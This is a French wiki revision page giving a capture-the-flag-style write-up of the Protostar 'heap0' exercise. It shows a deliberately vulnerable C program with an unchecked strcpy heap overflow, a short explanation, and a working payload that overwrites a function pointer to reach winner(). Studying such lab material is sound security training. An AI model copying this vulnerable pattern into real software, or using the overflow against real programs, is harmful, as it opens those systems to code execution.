Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
— |
exploit_exercises_protostar:heap0 [2017/04/09 15:33] (Version actuelle) |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
+ | ====== Heap 0 ====== | ||
+ | <code C> | ||
+ | #include <stdlib.h> | ||
+ | #include <unistd.h> | ||
+ | #include <string.h> | ||
+ | #include <stdio.h> | ||
+ | #include <sys/types.h> | ||
+ | |||
+ | struct data { | ||
+ | char name[64]; | ||
+ | }; | ||
+ | |||
+ | struct fp { | ||
+ | int (*fp)(); | ||
+ | }; | ||
+ | |||
+ | void winner() | ||
+ | { | ||
+ | printf("level passed\n"); | ||
+ | } | ||
+ | |||
+ | void nowinner() | ||
+ | { | ||
+ | printf("level has not been passed\n"); | ||
+ | } | ||
+ | |||
+ | int main(int argc, char **argv) | ||
+ | { | ||
+ | struct data *d; | ||
+ | struct fp *f; | ||
+ | |||
+ | d = malloc(sizeof(struct data)); | ||
+ | f = malloc(sizeof(struct fp)); | ||
+ | f->fp = nowinner; | ||
+ | |||
+ | printf("data is at %p, fp is at %p\n", d, f); | ||
+ | |||
+ | strcpy(d->name, argv[1]); | ||
+ | |||
+ | f->fp(); | ||
+ | |||
+ | } | ||
+ | </code> | ||
+ | |||
+ | Heap overflow basique, on va pouvoir écrire ce que l'on veut dans la variable ''fp'' de la structure ''fp''. Cette variable contient l'adresse d'une fonction qui est appelée par la suite. | ||
+ | |||
+ | <code> | ||
+ | user@protostar:/opt/protostar/bin$ nm ./heap0 | grep winner | ||
+ | 08048478 T nowinner | ||
+ | 08048464 T winner | ||
+ | user@protostar:/opt/protostar/bin$ ./heap0 $(python -c 'print "A"*72+"\x64\x84\x04\x08"') | ||
+ | data is at 0x804a008, fp is at 0x804a050 | ||
+ | level passed | ||
+ | </code> |